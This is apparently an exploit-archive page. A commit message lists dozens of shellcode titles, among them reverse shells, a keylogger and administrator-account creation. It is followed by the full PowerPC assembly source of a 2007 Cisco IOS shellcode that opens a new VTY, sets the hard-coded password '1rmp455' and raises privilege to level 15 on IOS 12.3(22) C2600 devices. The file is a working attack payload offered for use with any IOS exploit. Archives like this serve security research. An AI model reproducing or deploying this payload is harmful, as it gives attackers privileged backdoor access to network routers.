995a8906f1
27 changes to exploits/shellcodes Oracle JDeveloper 11.1.x/12.x - Directory Traversal Shopware 5.2.5/5.3 - Cross-Site Scripting CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities PHPFreeChat 1.7 - Denial of Service OTRS 5.0.x/6.0.x - Remote Command Execution DarkComet (C2 Server) - File Upload BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve(/bin/sh) Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve(/bin/sh) Shellcode (58 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes) Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes) Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes) Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes) Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) Windows/x86-64 (7) - cmd Shellcode (61 bytes) Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes) Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes) Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes) Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes) Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes) Windows/x86 - Create Admin User (X) Shellcode (304 bytes) Windows/x86 - Create Administrator User (X) Shellcode (304 bytes) Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes) Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes) Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes) Windows/x86 (XP Professional SP2) - calc.exe Shellcode (57 bytes) Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes) Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes) Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes) Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes) Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
65 lines
No EOL
1.8 KiB
NASM
65 lines
No EOL
1.8 KiB
NASM
# ----------------------------------------------------------------------------------------
|
|
#
|
|
# Cisco IOS Bind shellcode v1.0
|
|
# (c) 2007 IRM Plc
|
|
# By Varun Uppal
|
|
#
|
|
# ----------------------------------------------------------------------------------------
|
|
#
|
|
# The code creates a new VTY, allocates a password then sets the privilege level to 15
|
|
#
|
|
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
|
|
# Once assembled, the payload is only 116 bytes in length
|
|
#
|
|
# The following four hard-coded addresses must be located for the target IOS version.
|
|
# Version 1.1 of the shellcode will auto-locate these values and make the code
|
|
# IOS-version-independent
|
|
#
|
|
# The hard-coded addresses used here are for:
|
|
#
|
|
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
|
|
#
|
|
# ----------------------------------------------------------------------------------------
|
|
.equ makenewvty, 0x803d0d08
|
|
.equ malloc, 0x804785cc
|
|
.equ setpwonline, 0x803b9e90
|
|
.equ linesstruct, 0x82f9e334
|
|
# ----------------------------------------------------------------------------------------
|
|
|
|
.equ priv, 0xf1000000 #value used to set the privilege level
|
|
|
|
main: li 3,71 #new vty line = 71
|
|
lis 9,makenewvty@ha
|
|
la 9,makenewvty@l(9)
|
|
mtctr 9
|
|
bctrl #makenewvty()
|
|
|
|
li 3,0x1e5c
|
|
lis 9,malloc@ha
|
|
la 9,malloc@l(9)
|
|
mtctr 9
|
|
bctrl #malloc() memory for structure
|
|
|
|
li 4,70
|
|
stw 4,0xa68(3)
|
|
li 5,72
|
|
stw 5,0xa6c(3)
|
|
li 4,0x00
|
|
bl setp #pointer to the password into LR
|
|
|
|
.string "1rmp455" #the password for the line
|
|
|
|
setp: mflr 5
|
|
lis 9,setpwonline@ha
|
|
la 9,setpwonline@l(9)
|
|
mtctr 9
|
|
bctrl #setpwonline()
|
|
|
|
lis 8,linesstruct@ha
|
|
la 8,linesstruct@l(8)
|
|
lwz 9,0(8)
|
|
lis 7,priv@ha
|
|
la 7,priv@l(7)
|
|
stw 7,0xde4(9) #set privilege level to 15
|
|
|
|
# milw0rm.com [2008-08-13] |